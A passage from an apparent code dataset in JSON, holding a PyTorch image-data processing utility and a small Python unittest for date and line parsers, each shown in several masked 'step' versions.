tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n",
"step-5": "from dai_imports import*\nfrom obj_utils import*\nimport utils\n\nclass my_image_csv_dataset(Dataset):\n \n def __init__(self, data_dir, data, transforms_ = None, obj = False,\n minorities = None, diffs = None, bal_tfms = None):\n \n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n \n def __len__(self):\n return len(self.data)\n \n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir,self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n\n img = torchvision.transforms.functional.to_grayscale(img,num_output_channels=3)\n\n y = self.data.iloc[index, 1] \n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms,'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l) \n else: \n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms \n self.tfms = transforms.Compose(self.transforms_)\n # print(self.tfms)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else: \n self.tfms = transforms.Compose(self.transforms_) \n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s,tuple):\n s = s[0]\n row_scale = s/img.size[0]\n col_scale = s/img.size[1]\n y = rescale_bbox(y,row_scale,col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = (y,y2)\n return (x,y)\n\n\nclass my_image_folder(DatasetFolder):\n \n def __init__(self, root, transform=None, target_transform=None,\n loader=default_loader, minorities=None, diffs = None, bal_tfms=None, tta_tfms = None):\n \n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform,\n target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self,index):\n \n path, target = self.samples[index] \n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms,'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l) \n else: \n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self.transform )\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else: \n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\ndef extract_data(dt):\n\n x = []\n y = []\n for a,b in dt:\n x.append(a)\n y.append(b)\n return x,y\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)] \n\ndef get_minorities(df,thresh=0.8):\n\n c = df.iloc[:,1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [1-(x/max_count) for x in lc]\n diffs = dict((k,v) for k,v in zip(c.keys(),diffs))\n minorities = [c.keys()[x] for x,y in enumerate(lc) if y < (thresh*max_count)]\n return minorities,diffs\n\ndef csv_from_path(path, img_dest):\n\n path = Path(path)\n img_dest = Path(img_dest)\n labels_paths = list(path.iterdir())\n tr_images = []\n tr_labels = []\n for l in labels_paths:\n if l.is_dir():\n for i in list(l.iterdir()):\n if i.suffix in IMG_EXTENSIONS:\n name = i.name\n label = l.name\n new_name = '{}_{}'.format(path.name,name)\n new_path = img_dest/new_name\n# print(new_path)\n os.rename(i,new_path)\n tr_images.append(new_name)\n tr_labels.append(label) \n # os.rmdir(l)\n tr_img_label = {'Img':tr_images, 'Label': tr_labels}\n csv = pd.DataFrame(tr_img_label,columns=['Img','Label'])\n csv = csv.sample(frac=1).reset_index(drop=True)\n return csv\n\ndef add_extension(a,e):\n a = [x+e for x in a]\n return a\n\ndef one_hot(targets, multi = False):\n if multi:\n binerizer = MultiLabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n else:\n binerizer = LabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n return dai_1hot,binerizer.classes_\n\ndef get_index(arr,a):\n for i in range(len(arr)):\n if sum(arr[i] == a) == len(a):\n return i\n return False\n\ndef rescale_bbox(bb,row_scale,col_scale):\n bb = bb.reshape((-1,4))\n for b in bb:\n r1,c1,r2,c2 = b\n b[0] = int(np.round(r1*col_scale))\n b[1] = int(np.round(c1*row_scale))\n b[2] = int(np.round(r2*col_scale))\n b[3] = int(np.round(c2*row_scale))\n\n # bb = torch.tensor([bb_hw(b) for b in bb.reshape(-1,4)])\n # for b in bb:\n # r1,c1,r2,c2 = b\n # b[0] = int(np.round(r1*row_scale))\n # b[1] = int(np.round(c1*col_scale))\n # b[2] = int(np.round(r2*row_scale))\n # b[3] = int(np.round(c2*col_scale))\n # if(sum(b)) == 1:\n # b[0],b[1],b[2],b[3] = 0,0,0,0\n\n bb = bb.reshape((1,-1)) \n return bb\n\ndef get_img_stats(dataset,sz):\n\n size = int(len(dataset)*sz)\n i = 0\n imgs = []\n for img,_ in dataset:\n # print(img.size())\n if i > size:\n break\n imgs.append(img)\n i+=1\n imgs_ = torch.stack(imgs,dim=3)\n imgs_ = imgs_.view(3,-1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean,imgs_std\n\ndef split_df(train_df,test_size = 0.15):\n try: \n train_df,val_df = train_test_split(train_df,test_size = test_size,random_state = 2,stratify = train_df.iloc[:,1])\n except:\n train_df,val_df = train_test_split(train_df,test_size = test_size,random_state = 2)\n train_df = train_df.reset_index(drop = True)\n val_df = val_df.reset_index(drop = True)\n return train_df,val_df \n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\ndef load_obj(path):\n with open(path, 'rb') as f:\n return pickle.load(f)\n\nclass DataProcessor:\n \n def __init__(self, data_path = None, train_csv = None, val_csv = None, reg = False,\n tr_name = 'train', val_name = 'val', test_name = 'test', extension = None, setup_data = True):\n \n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n \n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n \n self.data_path,self.train_csv,self.val_csv,self.reg,self.tr_name,self.val_name,self.test_name,self.extension = (data_path,train_csv,\n val_csv,reg,tr_name,val_name,test_name,extension)\n \n self.obj = False\n self.multi_label = False\n \n if setup_data:\n self.set_up_data()\n \n def set_up_data(self,split_size = 0.15):\n\n data_path,train_csv,val_csv,tr_name,val_name,test_name = (self.data_path,self.train_csv,self.val_csv,self.tr_name,self.val_name,self.test_name)\n\n # check if paths given and also set paths\n \n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path,tr_name)\n val_path = os.path.join(data_path,val_name)\n test_path = os.path.join(data_path,test_name)\n\n if os.path.exists(os.path.join(data_path,tr_name+'.csv')):\n train_csv = tr_name+'.csv'\n # if os.path.exists(os.path.join(data_path,val_name+'.csv')):\n # val_csv = val_name+'.csv'\n # if os.path.exists(os.path.join(data_path,test_name+'.csv')):\n # test_csv = test_name+'.csv' \n\n # paths to csv\n\n if not train_csv:\n print('no')\n train_csv,val_csv,test_csv = self.data_from_paths_to_csv(data_path,tr_path,val_path,test_path)\n\n train_csv_path = os.path.join(data_path,train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True \n img_names = [str(x) for x in list(train_df.iloc[:,0])]\n if self.extension:\n img_names = add_extension(img_names,self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path,val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str,list(val_df.iloc[:,1])))\n if test_csv:\n test_csv_path = os.path.join(data_path,test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str,list(test_df.iloc[:,1]))) \n targets = list(map(str,list(train_df.iloc[:,1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n\n # bounding boxes\n\n int_targets = [list(map(float,x)) for x in split_targets]\n zero_targets = np.zeros((len(targets),max(lengths)),dtype=int)\n for i,t in enumerate(zero_targets):\n t[len(t)-len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:,1] = [torch.from_numpy(z).type(torch.FloatTensor) for z in zero_targets]\n\n # one-hot classes\n\n obj_targets = list(map(str,list(train_df.iloc[:,2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int,x)) for x in obj_split_targets]\n except:\n pass\n dai_onehot,onehot_classes = one_hot(obj_split_targets,True)\n # train_df['one_hot'] = [torch.from_numpy(x).type(torch.FloatTensor) for x in dai_onehot]\n\n # class indexes\n\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in obj_split_targets]\n zero_idx = np.zeros((len(targets),max(lengths)//4),dtype=int)\n # print(zero_idx.shape)\n for i,t in enumerate(zero_idx):\n # temp_l = len(class_idx[i])\n # if temp_l > 90:\n # print(i,temp_l)\n t[len(t)-len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:,2] = [torch.from_numpy(z).type(torch.LongTensor) for z in zero_idx]\n self.data_dir,self.num_classes,self.class_names = data_path,len(onehot_classes),onehot_classes\n # self.set_up_object_detection([4,2,1],[0.7, 1., 1.3],[(1.,1.), (1.,0.5), (0.5,1.)])\n\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int,x)) for x in split_targets]\n zero_targets = np.zeros((len(targets),max(lengths)),dtype=int)\n for i,t in enumerate(zero_targets):\n t[len(t)-len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:,1] = [torch.from_numpy(z).type(torch.FloatTensor) for z in zero_targets]\n self.data_dir,self.num_classes,self.class_names = data_path, max(lengths),np.unique(zero_targets,axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int,x)) for x in split_targets]\n except:\n pass\n dai_onehot,onehot_classes = one_hot(split_targets,self.multi_label)\n train_df.iloc[:,1] = [torch.from_numpy(x).type(torch.FloatTensor) for x in dai_onehot]\n self.data_dir,self.num_classes,self.class_names = data_path,len(onehot_classes),onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:,1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:,1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:,1] = target_ids \n self.data_dir,self.num_classes,self.class_names = data_path,len(unique_targets),unique_targets\n\n # self.models_path = os.path.join(self.data_dir, 'models')\n # os.makedirs(self.models_path,exist_ok=True)\n\n if not val_csv:\n train_df,val_df = split_df(train_df,split_size)\n if not test_csv: \n val_df,test_df = split_df(val_df,split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:,0])]\n val_images = [str(x) for x in list(val_df.iloc[:,0])]\n test_images = [str(x) for x in list(test_df.iloc[:,0])]\n if self.extension:\n tr_images = add_extension(tr_images,self.extension)\n val_images = add_extension(val_images,self.extension)\n test_images = add_extension(test_images,self.extension)\n train_df.iloc[:,0] = tr_images\n val_df.iloc[:,0] = val_images\n test_df.iloc[:,0] = test_images\n train_df.to_csv(os.path.join(data_path,'train.csv'),index=False)\n val_df.to_csv(os.path.join(data_path,'val.csv'),index=False)\n test_df.to_csv(os.path.join(data_path,'test.csv'),index=False)\n self.minorities,self.class_diffs = None,None\n if (not self.obj) or (not self.multi_label):\n self.minorities,self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name:train_df, self.val_name:val_df, self.test_name:test_df}\n data_dict = {'data_dfs':self.data_dfs,'data_dir':self.data_dir,'num_classes':self.num_classes,'class_names':self.class_names,\n 'minorities':self.minorities,'class_diffs':self.class_diffs,'obj':self.obj,'multi_label':self.multi_label}\n # save_obj(data_dict,os.path.join(self.data_dir,'data_dict.pkl'))\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self,data_path,tr_path,val_path = None,test_path = None):\n \n train_df = csv_from_path(tr_path,tr_path)\n train_df.to_csv(os.path.join(data_path,self.tr_name+'.csv'),index=False)\n ret = (self.tr_name+'.csv',None)\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path,tr_path)\n val_df.to_csv(os.path.join(data_path,self.val_name+'.csv'),index=False)\n ret = (self.tr_name+'.csv',self.val_name+'.csv')\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path,tr_path)\n test_df.to_csv(os.path.join(data_path,self.test_name+'.csv'),index=False)\n ret = (self.tr_name+'.csv',self.val_name+'.csv',self.test_name+'.csv') \n return ret\n \n def get_data(self, data_dict = None, s = (224,224), dataset = my_image_csv_dataset, bs = 32, balance = False, tfms = None,\n bal_tfms = None, tta = False, num_workers = 4, stats_percentage = 0.6):\n \n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs,data_dir,minorities,class_diffs,obj,multi_label = (data_dict['data_dfs'],data_dict['data_dir'],data_dict['minorities'],\n data_dict['class_diffs'],data_dict['obj'],data_dict['multi_label'])\n if obj or multi_label:\n balance = False \n if tta:\n tta_tfms = {self.tr_name: transforms.Compose( \n [\n# transforms.TenCrop(s),\n transforms.FiveCrop(s[0]), \n transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops:torch.stack(\n [transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))\n \n ]),\n self.val_name: transforms.Compose(\n [\n# transforms.TenCrop(s),\n transforms.FiveCrop(s[0]),\n transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops:torch.stack(\n [transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))\n ]),\n self.test_name: transforms.Compose(\n [\n# transforms.TenCrop(s),\n transforms.FiveCrop(s[0]),\n transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops:torch.stack(\n [transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))\n ])}\n# tta_tfms = {self.tr_name: transforms.Compose([\n# transforms.Resize(s),\n# transforms.ToTensor(),\n# transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n# ]),\n# self.val_name: transforms.Compose([\n# transforms.Resize(s), \n# transforms.ToTensor(),\n# transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n# ]) }\n \n else:\n tta_tfms = None\n \n if not bal_tfms:\n bal_tfms = { self.tr_name: [transforms.RandomHorizontalFlip()],\n \n self.val_name: None,\n self.test_name: None \n }\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n # resize_transform = transforms.RandomResizedCrop(s[0])\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [\n resize_transform,\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]\n else:\n \n tfms_temp = [\n resize_transform,\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n \n data_transforms = {\n self.tr_name: tfms,\n self.val_name: [\n # transforms.Resize(s[0]+50),\n # transforms.CenterCrop(s[0]),\n transforms.Resize(s),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ],\n self.test_name: [\n # transforms.Resize(s[0]+50),\n # transforms.CenterCrop(s[0]),\n transforms.Resize(s),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]\n }\n\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir,self.tr_name),data_dfs[self.tr_name],temp_tfms)\n self.img_mean,self.img_std = get_img_stats(temp_dataset,stats_percentage)\n data_transforms[self.tr_name][-1].mean,data_transforms[self.tr_name][-1].std = self.img_mean,self.img_std\n data_transforms[self.val_name][-1].mean,data_transforms[self.val_name][-1].std = self.img_mean,self.img_std\n data_transforms[self.test_name][-1].mean,data_transforms[self.test_name][-1].std = self.img_mean,self.img_std\n\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir,self.tr_name),data_dfs[x],\n data_transforms[x],obj,minorities,class_diffs,bal_tfms[x])\n for x in [self.tr_name, self.val_name, self.test_name]} \n else:\n image_datasets = {x: dataset(os.path.join(data_dir,self.tr_name),data_dfs[x],\n data_transforms[x],obj)\n for x in [self.tr_name, self.val_name, self.test_name]}\n \n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=bs,\n shuffle=True, num_workers=num_workers)\n for x in [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name, self.val_name, self.test_name]}\n \n self.image_datasets,self.dataloaders,self.dataset_sizes = (image_datasets,dataloaders,\n dataset_sizes)\n \n return image_datasets,dataloaders,dataset_sizes\n\n def imshow(self,inp, title=None):\n \n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self,inp,calculate = False):\n\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else: \n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp \n \n def show_data(self,folder_name = 'train', size = (64,64), bs = 5):\n \n self.get_data(size,bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0],batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes]) \n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(torch.LongTensor))] for x in classes]) \n else: \n self.imshow(out, title=[self.class_names[x] for x in classes])\n\n # def set_up_object_detection(self,anc_grids,anc_zooms,anc_ratios,num_colr = 12):\n\n # # print('Would you like to give your own values for anchor_grids, anchor_zooms,and anchor_ratios? The default values are: {}, {} and {}'\n # # .format(anc_grids,anc_zooms,anc_ratios))\n # # print('If so, you may call the function \"set_up_object_detection\" with your own paramteres.')\n\n # cmap = get_cmap(num_colr)\n # self.colr_list = [cmap(float(x)) for x in range(num_colr)]\n # self.num_colr = num_colr\n # self.create_anchors(anc_grids,anc_zooms,anc_ratios)\n # self.custom_head = SSD_MultiHead(self.k,self.num_classes,0.45,-4.)\n # self.loss_f = FocalLoss(self.num_classes)\n\n # def create_anchors(self,anc_grids,anc_zooms,anc_ratios):\n \n # anchor_scales = [(anz*i,anz*j) for anz in anc_zooms for (i,j) in anc_ratios]\n # k = len(anchor_scales)\n # anc_offsets = [1/(o*2) for o in anc_grids]\n # anc_x = np.concatenate([np.repeat(np.linspace(ao, 1-ao, ag), ag)\n # for ao,ag in zip(anc_offsets,anc_grids)])\n # anc_y = np.concatenate([np.tile(np.linspace(ao, 1-ao, ag), ag)\n # for ao,ag in zip(anc_offsets,anc_grids)])\n # anc_ctrs = np.repeat(np.stack([anc_x,anc_y], axis=1), k, axis=0)\n # anc_sizes = np.concatenate([np.array([[o/ag,p/ag] for i in range(ag*ag) for o,p in anchor_scales])\n # for ag in anc_grids])\n # grid_sizes = torch.tensor(np.concatenate([np.array(\n # [ 1/ag for i in range(ag*ag) for o,p in anchor_scales])\n # for ag in anc_grids])).float().unsqueeze(1).to(self.device)\n # anchors = torch.tensor(np.concatenate([anc_ctrs, anc_sizes], axis=1)).float().to(self.device)\n # anchor_cnr = hw2corners(anchors[:,:2], anchors[:,2:])\n # self.anchors,self.anchor_cnr,self.grid_sizes,self.k = anchors,anchor_cnr,grid_sizes,k \n\n\n\n\n\n\n\n\n",
"step-ids": [
15,
16,
19,
25,
29
]
}
|
[
15,
16,
19,
25,
29
] |
"""
Tests for parsers.py
@author Kevin Wilson <[email protected]>
"""
import crisis.parsers as undertest
import datetime
import unittest
class TestParsers(unittest.TestCase):
def test_parse_date(self):
date = '8/5/2013 16:14'
self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14),
undertest.parse_date(date))
def test_part_date_short(self):
date = '8/5/13 16:14'
self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14),
undertest.parse_date_short(date))
def test_parse_line(self):
line = ["1","2","3"]
actual = undertest.parse_line(line)
expected = [1,2,3]
self.assertTrue(all(x == y for x, y in zip(expected, actual)))
if __name__ == '__main__':
unittest.main()
|
normal
|
{
"blob_id": "253d37f29e33f61d7e1a5ec2f9a1d6307a2ae108",
"index": 6921,
"step-1": "<mask token>\n\n\nclass TestParsers(unittest.TestCase):\n <mask token>\n\n def test_part_date_short(self):\n date = '8/5/13 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date_short(date))\n\n def test_parse_line(self):\n line = ['1', '2', '3']\n actual = undertest.parse_line(line)\n expected = [1, 2, 3]\n self.assertTrue(all(x == y for x, y in zip(expected, actual)))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestParsers(unittest.TestCase):\n\n def test_parse_date(self):\n date = '8/5/2013 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date(date))\n\n def test_part_date_short(self):\n date = '8/5/13 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date_short(date))\n\n def test_parse_line(self):\n line = ['1', '2', '3']\n actual = undertest.parse_line(line)\n expected = [1, 2, 3]\n self.assertTrue(all(x == y for x, y in zip(expected, actual)))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestParsers(unittest.TestCase):\n\n def test_parse_date(self):\n date = '8/5/2013 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date(date))\n\n def test_part_date_short(self):\n date = '8/5/13 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date_short(date))\n\n def test_parse_line(self):\n line = ['1', '2', '3']\n actual = undertest.parse_line(line)\n expected = [1, 2, 3]\n self.assertTrue(all(x == y for x, y in zip(expected, actual)))\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "<mask token>\nimport crisis.parsers as undertest\nimport datetime\nimport unittest\n\n\nclass TestParsers(unittest.TestCase):\n\n def test_parse_date(self):\n date = '8/5/2013 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date(date))\n\n def test_part_date_short(self):\n date = '8/5/13 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date_short(date))\n\n def test_parse_line(self):\n line = ['1', '2', '3']\n actual = undertest.parse_line(line)\n expected = [1, 2, 3]\n self.assertTrue(all(x == y for x, y in zip(expected, actual)))\n\n\nif __name__ == '__main__':\n unittest.main()\n",
